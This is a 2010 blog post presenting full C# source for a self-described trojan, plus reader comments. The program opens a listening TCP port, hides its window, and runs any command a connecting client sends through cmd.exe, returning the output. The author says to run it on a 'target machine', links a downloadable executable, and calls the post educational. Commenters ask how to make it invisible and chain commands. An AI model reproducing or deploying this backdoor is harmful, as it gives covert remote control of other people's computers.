Saturday, May 1, 2010

My own C# trojan - remote shell command execution

In this post I will present you a simple "shell" I created using c#.NET.
The trojan runs in the background, opens a listening port on the machine running it and allows any connected client to execute remote shell commands.
This application is for educational purposes only (mostly my own).

how to use it?

Simply run the trojan on the target machine and connect to it through port 13000 using telnet or netcat. After the connection had established, you may execute any shell command on the target machine:











code:
[STAThread]
        static void Main()
        {
            ProcessStartInfo processInfo;
            Process process;
            TcpListener server = null;
            bool isFirst = true;

            try
            {
                // Set the TcpListener on port 13000.
                Int32 port = 13000;
                // Set the server to run locally
                IPAddress localAddr = IPAddress.Parse("127.0.0.1");
                server = new TcpListener(localAddr, port);
                // Start listening for client requests.
                server.Start();
                // Buffer for reading data
                Byte[] bytes = new Byte[256];
                String command = null;
                int i;
                string recv_char;
                byte[] msg;
                // Perform a blocking call to accept requests.
                TcpClient client = server.AcceptTcpClient();
                // Get a stream object for reading and writing
                NetworkStream stream = client.GetStream();
                // Say hello
                msg = System.Text.Encoding.ASCII.GetBytes("Welcome Master! enter a command to execute or enter exit:\r\n");
                stream.Write(msg, 0, msg.Length);

                // Enter the listening loop.
                while (true)
                {
                    if (!isFirst)
                    {
                        msg = System.Text.Encoding.ASCII.GetBytes("Enter a command:\r\n");
                        stream.Write(msg, 0, msg.Length);
                    }
                    // reset the command                                        
                    command = null;                                        

                    // Loop to receive all the data sent by the client.
                    while ((i = stream.Read(bytes, 0, bytes.Length)) != 0)
                    {                        
                        // Translate data bytes to a ASCII string.
                        recv_char = System.Text.Encoding.ASCII.GetString(bytes, 0, i);
                        command += recv_char;
                        if (command.Contains("\n"))
                            break;
                    }
                    if (command.Equals("exit\r\n"))
                    {
                        // If exit entered shutdown and end connection
                        msg = System.Text.Encoding.ASCII.GetBytes("Bye Bye Master...\r\n");
                        stream.Write(msg, 0, msg.Length);
                        client.Close();
                        break;
                    }
                    // execute the command received (/C to terminate process after execution):
                    processInfo = new ProcessStartInfo("cmd.exe", "/C " + command);
                    processInfo.CreateNoWindow = true; // don't open a window
                    processInfo.RedirectStandardOutput = true; // don't show output
                    processInfo.UseShellExecute = false; // don't use a shell
                    process = Process.Start(processInfo); // start the process                    
                    string output = process.StandardOutput.ReadToEnd();
                    process.Close(); // close the process 
                    isFirst = false;                   
                    if (output != null)
                    {
                        msg = System.Text.Encoding.ASCII.GetBytes(output + "\n");
                        // Send back a response.
                        stream.Write(msg, 0, msg.Length);
                    }
                    else
                    {
                        msg = System.Text.Encoding.ASCII.GetBytes("Sorry Master, command execution failed\r\n");
                        // Send back a response.
                        stream.Write(msg, 0, msg.Length);
                    }                    
                }                
            }
            catch
            {
                // do nothing
            }
            finally
            {
                // Stop listening for new clients.
                server.Stop();
            }
        }        
You may download the executable file from here.
Oh.. and don't forget to kill that process when you finish playing with it :)

-herzel

6 comments:

  1. סוס נחמד. רק שכל קוד ב-NET. אפשר לראות בעזרת Reflector.

    ReplyDelete
  2. thanx! I wrote this code just to demonstrate how a simple trojan is written in C#. I don't think its smart to write malware in .NET.

    ReplyDelete
  3. let me rephrase that, I don't think its smart to write malware at all :)

    ReplyDelete
  4. How do you make the console application invisible??

    ReplyDelete
    Replies
    1. hey in this given program the issue is that after executing the command the cmd is closed. what if i want to execute a sequence of commands which require the output of previous commands like directory traversal cd command ??

      Delete